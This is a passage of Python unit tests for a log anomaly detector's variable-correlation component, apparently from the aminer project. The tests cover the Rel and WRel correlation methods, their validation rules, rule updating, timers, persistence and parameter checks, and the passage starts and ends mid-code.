if key == 0.0: self.assertEqual({key: 10}, value) # as the Rel method can learn only one relation, the values should be 2, 4, 6 and 8 when the key is divisible # by 2 and smaller than 10. elif key % 2 == 0 and key < 10.0: self.assertEqual({key: 4}, value) # as the Rel method can learn only one relation, the values should be 2, 4, 6 and 8 when the key is divisible # by 2 and greater or equal 10. elif key % 2 == 0: self.assertEqual({(key/2): 5}, value) else: raise ValueError("The %f: %f combination must not occur in Rel." % (key, value)) # relations should be found in both directions and the count should be equal. cnt_half = 0 # for example key = 18.0 -> inner key = 9.0 cnt_double = 0 # for example key = 9.0 -> inner key = 18.0 for w_rel in w_rel_list[0]: for r in w_rel: step = 1.0 # search for the step size for k in r: if k >= 10.0: step = 2.0 if step == 1.0: cnt_half += 1 else: cnt_double += 1 for i in range(len(r)): key = (i % 20 >= 10)*10 + ((i % 10) * step) value = r[key] # there is no difference between the first half and the second half of the data, when value = 0. if key == 0.0: self.assertEqual({key: 10}, value) # this if is only reached when step = 2.0. elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif step == 1.0: self.assertEqual({key*2: 5, key: 5}, value) elif step == 2.0: self.assertEqual({key/2: 5, key: 5}, value) else: raise ValueError("The %f: %f combination must not occur in WRel." 
% (key, value))  # NOTE(review): value appears to be a dict here (it is compared against dicts above), so "%f" would raise TypeError instead of the intended ValueError - TODO confirm and use %s.
# exactly one relation per direction must have been learned (step 1.0 and step 2.0 each seen once).
self.assertEqual(cnt_half, 1)
self.assertEqual(cnt_double, 1)

def test9nonexistent_preselection_methods(self):
    """Check that an unknown preselection method name in used_presel_meth is rejected with ValueError at construction."""
    etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
    self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_presel_meth=["nonexistentPreselMeth"])

def test10nonexistent_correlation_methods(self):
    """
    Check that an unknown correlation method name in used_cor_meth is rejected with ValueError at construction.
    (Only the unknown-name case is exercised here; an empty used_cor_meth list is not covered by this test.)
    """
    etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
    self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_cor_meth=["nonexistentCorDMeth"])

def test11validate_correlation_rules_coverVals(self):
    """
    Check the coverVals validation method for validate_cor_cover_vals_thres in the interval [0.1..1.0] in steps of 0.1.

    For every threshold h*0.1 a fresh ETD/VCD pair is initialized, the rel_list/w_rel_list are then overwritten with
    hand-crafted relations, and validate_cor() is run. A relation whose summed value count is smaller than h*10 (the
    threshold in percent of 100 values) must be emptied by the validation; otherwise the lists must stay unchanged.
    NOTE(review): the original wording described child values of (i % 10) * 2 every 7th atom, but the data loop that
    follows feeds (i % 10) for both root and child; the validation itself only acts on the hand-crafted lists - confirm.
    """
    t = time.time()
    # run test for every 10% of validate_cor_cover_vals_thres
    for h in range(1, 11, 1):
        etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
        vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_validate_cor_meth=["coverVals"], validate_cor_cover_vals_thres=0.7, num_init=self.dataset_size)
        # set new validate_cor_cover_vals_thres (the constructor value 0.7 is overridden for every iteration).
        vcd.validate_cor_cover_vals_thres = h*0.1
        # init and validate. This is needed as the ETD also needs to be initialized.
for i in range(self.dataset_size): stat_data = str((i % 10)).encode() children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) vcd.rel_list = [[[{9.0: {9.0: 26}, 16.0: {16.0: 13}}, {9.0: {9.0: 26}, 16.0: {16.0: 13}}]]] vcd.w_rel_list = [[[{9.0: {9.0: 26}, 16.0: {16.0: 13, 8.0: 5}}, {9.0: {9.0: 26}, 16.0: {16.0: 13, 8.0: 5}}]]] vcd.pos_var_cor = [[[0, 1]]] old_rel_list = deepcopy(vcd.rel_list[0]) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) vcd.validate_cor() self.assertEqual(len(old_rel_list), len(vcd.rel_list[0])) self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0])) for i, rel in enumerate(vcd.rel_list[0]): for r in old_rel_list[i]: cnt = 0 for key in r: for val in r[key]: cnt += r[key][val] # when the count is smaller than validate_cor_cover_vals_thres in percent, then there should not be any correlations. # h must be multiplied by 10 as it represents 10% steps. if cnt < h * 10: for val in rel: self.assertEqual({}, val) else: self.assertEqual(vcd.rel_list[0], old_rel_list) for i, rel in enumerate(vcd.w_rel_list[0]): for r in old_w_rel_list[i]: cnt = 0 for key in r: for val in r[key]: cnt += r[key][val] # when the count is smaller than validate_cor_cover_vals_thres in percent, then there should not be any correlations. # h must be multiplied by 10 as it represents 10% steps. if cnt < h * 10: for val in rel: self.assertEqual({}, val) else: self.assertEqual(vcd.w_rel_list[0], old_w_rel_list) def test12validate_correlation_rules_distinctDistr(self): """ This test case checks the functionality of the distinctDistr validation method. The first collection of datasets is similar and therefore produces more correlations. The second collection of datasets is not so similar and the number of correlations is smaller. 
The expected correlations can not be compared directly, because the order of the correlations is not guaranteed with the distinctDistr validation method. To achieve the equality test, both correlation variables are compared to [[], [], []] after all existing correlations are removed. """ t = time.time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_validate_cor_meth=["distinctDistr"], validate_cor_distinct_thres=0.05, num_init=self.dataset_size) # init and validate similar_data1 = [b"a"]*50 + [b"b"]*20 + [b"c"]*25 + [b"d"]*5 similar_data2 = [b"a"]*45 + [b"b"]*25 + [b"c"]*15 + [b"d"]*10 + [b"e"]*5 similar_data3 = [b"a"]*55 + [b"b"]*15 + [b"c"]*20 + [b"d"]*10 unsimilar_data1 = [b"a"]*50 + [b"b"]*20 + [b"c"]*25 + [b"d"]*5 unsimilar_data2 = [b"a"]*10 + [b"b"]*15 + [b"c"]*15 + [b"d"]*10 + [b"e"]*50 unsimilar_data3 = [b"a"]*25 + [b"b"]*15 + [b"c"]*50 + [b"d"]*10 for i in range(self.dataset_size): children = [MatchElement(str(1), similar_data2[i], similar_data2[i], None), MatchElement(str(2), similar_data3[i], similar_data3[i], None)] log_atom = LogAtom(str(similar_data1).encode(), ParserMatch(MatchElement("/", similar_data1[i], similar_data1[i], children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) vcd.validate_cor() self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0])) expected_similar_correlations = [[{ "d": {"e": 5}, "c": {"d": 10, "c": 15}, "b": {"b": 20}, "a": {"b": 5, "a": 45}}, { "e": {"d": 5}, "d": {"c": 10}, "c": {"c": 15}, "b": {"b": 20, "a": 5}, "a": {"a": 45}}], [{ "d": {"d": 5}, "c": {"d": 5, "c": 20}, "b": {"b": 15, "a": 5}, "a": {"a": 50}}, { "d": {"d": 5, "c": 5}, "c": {"c": 20}, "b": {"b": 15}, "a": {"b": 5, "a": 50}}], [{ "e": {"d": 5}, "d": {"d": 5, "c": 5}, "c": {"c": 15}, "b": {"b": 15, "a": 10}, "a": {"a": 45}}, 
{"d": {"e": 5, "d": 5}, "c": {"d": 5, "c": 15}, "b": {"b": 15}, "a": {"b": 10, "a": 45}}]] for w_rel in vcd.w_rel_list[0]: for cor in w_rel: deleted = False for expected_similar_correlation in expected_similar_correlations: if cor in expected_similar_correlation: index = expected_similar_correlation.index(cor) del expected_similar_correlation[index] deleted = True break # if the correlation was not deleted an error is raised and the test fails. if not deleted: raise ValueError("Correlation %s could not be found in the WRel List." % cor) self.assertEqual([[], [], []], expected_similar_correlations) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=True, sim_thres=0.1, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_validate_cor_meth=["distinctDistr"], validate_cor_distinct_thres=0.05, num_init=self.dataset_size) for i in range(self.dataset_size): children = [MatchElement(str(1), unsimilar_data2[i], unsimilar_data2[i], None), MatchElement(str(2), unsimilar_data3[i], unsimilar_data3[i], None)] log_atom = LogAtom(unsimilar_data1[i], ParserMatch(MatchElement("/", unsimilar_data1[i], unsimilar_data1[i], children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vtd.receive_atom(log_atom) vcd.init_cor(0) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) vcd.validate_cor() self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0])) expected_unsimilar_correlations = [[ {}, {"a": {"a": 10}, "b": {"a": 15}, "c": {"a": 15}, "d": {"a": 10}, "e": {"b": 20, "c": 25, "d": 5}}], [ {}, {"a": {"a": 25}, "b": {"a": 15}, "d": {"c": 5, "d": 5}}], [ {"a": {"a": 10}, "b": {"a": 15}, "c": {"b": 15}, "d": {"c": 10}, "e": {"c": 40, "d": 10}}, { "a": {"a": 10, "b": 15}, "b": {"c": 15}, "c": {"d": 10, "e": 
40}, "d": {"e": 10}}]] for w_rel in vcd.w_rel_list[0]: for cor in w_rel: deleted = False for expected_unsimilar_correlation in expected_unsimilar_correlations: if cor in expected_unsimilar_correlation: index = expected_unsimilar_correlation.index(cor) del expected_unsimilar_correlation[index] deleted = True break # if the correlation was not deleted an error is raised and the test fails. if not deleted: raise ValueError("Correlation %s could not be found in the WRel List.%s" % (cor, vcd.w_rel_list[0])) self.assertEqual([[], [], []], expected_unsimilar_correlations) def test13validate_correlation_rules_distinctDistr_without_WRel(self): """This test case checks if an error occurs, when using the distinctDistr validation method without the WRel correlation method.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_cor_meth=["Rel"], used_validate_cor_meth=["distinctDistr"]) def test14nonexistent_validation_method(self): """This test case checks if an error occurs, when using an nonexistent validation method or empty list.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_validate_cor_meth=["nonexistentValidateCorDMeth"]) def test15update_and_test_correlation_rules_with_rel_correlation_method(self): """ This test case checks the functionality of the Rel correlation method in the update, correlation generation and test phases. The correlations are initialized with 10 values for each correlation and keys calculated with (i % 10) * 0.1. In the update phase keys are calculated with (i % 10) * 0.2. 
Due to that the existing value"s count must stay the same in cases where new values are not created and new values must be created from 1.0 to 1.8. Values are increased by or created with a count of 10. """ etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["Rel"], num_init=self.dataset_size) self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True) for rel in vcd.rel_list[0]: for r in rel: for i in r: key = i value = r[key] # existing values which are divisible by 2 and smaller than 10.0 should be updated. if key % 2 == 0 and key < 10.0: self.assertEqual({key: 20}, value) # new values which are divisible by 2 and greater than 10.0 should be created. # other values should stay the same as before. else: self.assertEqual({key: 10}, value) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["Rel"], num_init=self.dataset_size) self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False) for rel in vcd.rel_list[0]: for r in rel: for i in r: key = i value = r[key] # no new values should be created. self.assertFalse(key % 2 == 0 and key >= 10.0) # existing values which are divisible by 2 and smaller than 10.0 should be updated. if key % 2 == 0 and key < 10.0: self.assertEqual({key: 20}, value) # other values should stay the same as before. 
else: self.assertEqual({key: 10}, value) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["Rel"], num_init=self.dataset_size) old_rel_list = self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=False, generate_rules=False) # no values in the rel_list should be changed. self.assertEqual(vcd.rel_list[0], old_rel_list) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["Rel"], num_init=self.dataset_size) offset = 200 self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False, offset=offset) # old correlations from child elements with the value being divisible by 2 should be deleted. The first ten correlations from the # initialization phase were not touched and should remain the same. The other correlation however should delete every value which # is divisible by 2. rel_list = deepcopy(vcd.rel_list[0]) # delete correlations from the init phase. for rel in vcd.rel_list[0]: if rel[0] == rel[1]: index = rel_list.index(rel) del rel_list[index] self.assertEqual(1, len(rel_list)) for rel in rel_list: # the order of the correlations is not guaranteed. if len(rel[0]) > len(rel[1]): rel0 = rel[0] rel1 = rel[1] else: rel0 = rel[1] rel1 = rel[0] for i in rel0: key = i value = rel0[key] self.assertEqual({key: 10}, value) for i in rel1: key = i value = rel1[key] # no values divisible by 2 should exist. 
self.assertFalse(key % 2 == 0) self.assertEqual({key: 10}, value) def update_or_test_with_rel_correlation_method(self, etd, vcd, update_rules, generate_rules, offset=0): """Run the update or test of rel correlations.""" t = time.time() values = [] # generate the initialization data with child elements being (i % 10) * 1. for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 1), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) # test if the initialization contains only correlations with 10 values. for rel in vcd.rel_list[0]: for r in rel: for i in r: key = i value = r[key] self.assertEqual({key: 10}, value) old_rel_list = deepcopy(vcd.rel_list[0]) values = [] # generate the update data with child elements being (i % 10) * 2. for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 2 + offset), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 2).encode(), str((i % 10) * 2).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.log_atom = log_atom vcd.update_rules[0] = update_rules vcd.generate_rules[0] = generate_rules vcd.update_or_test_cor(0) return old_rel_list def test16update_and_test_correlation_rules_with_w_rel_correlation_method(self): """ This test case checks the functionality of the WRel correlation method in the update, correlation generation and test phases. The correlations are initialized with 70% of the values having (i % 10) * 0.1 and 30% of the values having (i % 10) * 0.2. In the update phase the ratio is changed from 70:30 to 80:20. Thus the expected ratio is 75:25, when update_rules=True wihout offset. 
""" # This part tests if rules are updated when update_rules=True and generate_rules=True, however no new rules are generated as the # same data is passed on in the update process. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["WRel"], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 20}, value) elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 5, key: 15}, {key*2: 5, key: 15})) else: self.assertTrue(value in ({key: 15}, {key*2: 5, key: 15})) # This part tests if rules are updated when update_rules=True and generate_rules=False. Therefore the assumptions of correlations is # the same as above, because there were no new correlations generated due to the same data being used. 
etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["WRel"], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 20}, value) elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 5, key: 15}, {key*2: 5, key: 15})) else: self.assertTrue(value in ({key: 15}, {key*2: 5, key: 15})) # This part tests if rules are updated when update_rules=False and generate_rules=False. No correlation should be changed. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["WRel"], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) old_w_rel_list = self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=False, generate_rules=False) # no values in the rel_list should be changed. self.assertEqual(vcd.w_rel_list[0], old_w_rel_list) # This part tests if rules are updated when update_rules=True and generate_rules=False but with an offset of 200. Therefore the # assumptions of correlations for the first part should stay the same and no new correlations should be learned, because an offset # is added to all data. 
etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["WRel"], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) offset = 200 self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False, offset=offset) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertTrue(value in ({key: 10}, {key: 10, float(offset): 2})) elif key >= 10.0: self.assertEqual({key / 2: 3}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 3, key: 7, key*2+offset: 2})) else: self.assertTrue(value in ({key: 7}, {key*2: 3, key: 7, key*2+offset: 2})) # This part tests if rules are updated when update_rules=True and generate_rules=True but with an offset of 200. Therefore the # assumptions of correlations for the first part should stay the same and new correlations should be learned, because an offset # is added to all data. 
etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["WRel"], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) offset = 200 self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True, offset=offset) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertTrue(value in ({key: 10}, {key: 0, float(offset): 2})) elif key >= 10.0: self.assertTrue(value in ({(key-offset)/2: 2}, {key/2: 3}, {(key-offset)/2: 2, key: 8}, {key: 8})) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 0, key: 0, key*2+offset: 2})) else: self.assertTrue(value in ({key: 7}, {key*2: 0, key: 0, key*2+offset: 2})) def update_or_test_with_w_rel_correlation_method(self, etd, vcd, update_rules, generate_rules, offset=0): """ Run the update or test of w_rel correlations. This method initializes the vcd with a distribution of 70% 0.1 and 30% 0.2. In the update phase the distribution is 80% 1 and 20% 2. """ t = time.time() values = [] # generate the initialization data with child elements being (i % 10) * 1. 
for i in range(70): stat_data = bytes(str((i % 10) * 1), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) for i in range(30): stat_data = bytes(str((i % 10) * 2), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 10}, value) elif key >= 10.0: self.assertEqual({key/2: 3}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 3, key: 7})) else: self.assertTrue(value in ({key: 7}, {key*2: 3, key: 7})) values = [] for i in range(80): stat_data = bytes(str((i % 10) * 1 + offset), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) for i in range(20): stat_data = bytes(str((i % 10) * 2 + offset), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.log_atom = log_atom vcd.update_rules[0] = update_rules vcd.generate_rules[0] = generate_rules vcd.update_or_test_cor(0) return old_w_rel_list def test17init_and_update_timings(self): """This test checks if the init and update 
intervals are calculated correctly.""" t = time.time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, num_init=self.dataset_size, num_update=self.dataset_size) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 0.1), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 0.1).encode(), str((i % 10) * 0.1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.receive_atom(log_atom) if i < self.dataset_size - 1: self.assertEqual(vcd.pos_var_cor, []) self.assertEqual(vcd.pos_var_val, []) self.assertEqual(vcd.w_rel_list, []) self.assertEqual(vcd.rel_list, []) # just check if some values were learned and save them to compare. self.assertNotEqual(vcd.pos_var_cor, []) self.assertNotEqual(vcd.pos_var_val, []) self.assertNotEqual(vcd.w_rel_list, []) self.assertNotEqual(vcd.rel_list, []) old_pos_var_cor = deepcopy(vcd.pos_var_cor) old_pos_var_val = deepcopy(vcd.pos_var_val) old_w_rel_list = deepcopy(vcd.w_rel_list) old_rel_list = deepcopy(vcd.rel_list) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 1), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.receive_atom(log_atom) if i < self.dataset_size - 1: self.assertEqual(vcd.pos_var_cor, old_pos_var_cor) self.assertEqual(vcd.pos_var_val, old_pos_var_val) self.assertEqual(vcd.w_rel_list, old_w_rel_list) self.assertEqual(vcd.rel_list, old_rel_list) # no new values are expected as num_steps_create_new_rules is -1 by default. 
self.assertEqual(vcd.pos_var_cor, old_pos_var_cor)
self.assertEqual(vcd.pos_var_val, old_pos_var_val)
self.assertNotEqual(vcd.w_rel_list, old_w_rel_list)
self.assertNotEqual(vcd.rel_list, old_rel_list)

def test18do_timer(self):
    """
    Check do_timer against a fixed next_persist_time.

    The first call, 200 s before the persist deadline, must report 200 s remaining; a call exactly at the deadline must
    report DEFAULT_PERSISTENCE_PERIOD. The two remaining calls pin how the deadline moves afterwards: 1 s remaining at
    t + 999 implies a new deadline of t + 1000, which is then hit again and again reports DEFAULT_PERSISTENCE_PERIOD.
    """
    etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
    vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1)
    t = time.time()
    vcd.next_persist_time = t + 400
    # (trigger offset from t, expected return value), in call order - the order matters because the expectations
    # presumably depend on do_timer advancing next_persist_time on the calls that hit the deadline.
    expectations = [(200, 200), (400, DEFAULT_PERSISTENCE_PERIOD), (999, 1), (1000, DEFAULT_PERSISTENCE_PERIOD)]
    for delta, expected in expectations:
        self.assertEqual(vcd.do_timer(t + delta), expected)

def test19persistence(self):
    """Test the do_persist and load_persistence_data methods."""
    t = time.time()
    etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
    vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=False, sim_thres=0.5, gof_alpha=self.significance_niveau)
    vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1)
    for i in range(self.dataset_size):
        stat_data = bytes(str((i % 60) * 0.1), "utf-8")
        log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, None)), t, self.__class__.__name__)
        etd.receive_atom(log_atom)
        vtd.receive_atom(log_atom)
    vcd.init_cor(0)
    # the vcd should not learn any correlations in others data.
self.assertEqual(vcd.pos_var_cor, [[]]) self.assertEqual(vcd.pos_var_val, [[]]) self.assertEqual(vcd.discrete_indices, [[]]) self.assertEqual(vcd.update_rules, [True]) self.assertEqual(vcd.generate_rules, [True]) self.assertEqual(vcd.rel_list, [[]]) self.assertEqual(vcd.w_rel_list, [[]]) self.assertEqual(vcd.w_rel_num_ll_to_vals, [[]]) self.assertEqual(vcd.w_rel_ht_results, []) self.assertEqual(vcd.w_rel_confidences, []) vcd.do_persist() with open(vcd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[[]], [[]], [[]], [true], [true], [[]], [[]], [[]], [], []]') vcd.load_persistence_data() self.assertEqual(vcd.pos_var_cor, [[]]) self.assertEqual(vcd.pos_var_val, [[]]) self.assertEqual(vcd.discrete_indices, [[]]) self.assertEqual(vcd.update_rules, [True]) self.assertEqual(vcd.generate_rules, [True]) self.assertEqual(vcd.rel_list, [[]]) self.assertEqual(vcd.w_rel_list, [[]]) self.assertEqual(vcd.w_rel_num_ll_to_vals, [[]]) self.assertEqual(vcd.w_rel_ht_results, []) self.assertEqual(vcd.w_rel_confidences, []) other = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) self.assertEqual(vcd.pos_var_cor, other.pos_var_cor) self.assertEqual(vcd.pos_var_val, other.pos_var_val) self.assertEqual(vcd.discrete_indices, other.discrete_indices) self.assertEqual(vcd.update_rules, other.update_rules) self.assertEqual(vcd.generate_rules, other.generate_rules) self.assertEqual(vcd.rel_list, other.rel_list) self.assertEqual(vcd.w_rel_list, other.w_rel_list) self.assertEqual(vcd.w_rel_num_ll_to_vals, other.w_rel_num_ll_to_vals) self.assertEqual(vcd.w_rel_ht_results, other.w_rel_ht_results) self.assertEqual(vcd.w_rel_confidences, other.w_rel_confidences) def test20validate_parameters(self): """Test all initialization parameters for the detector. 
Input parameters must be validated in the class.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, ["default"], etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, None, etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, "", etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, b"Default", etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, True, etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, 123, etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, 123.3, etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, {"id": "Default"}, etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, (), etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, set(), etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, 
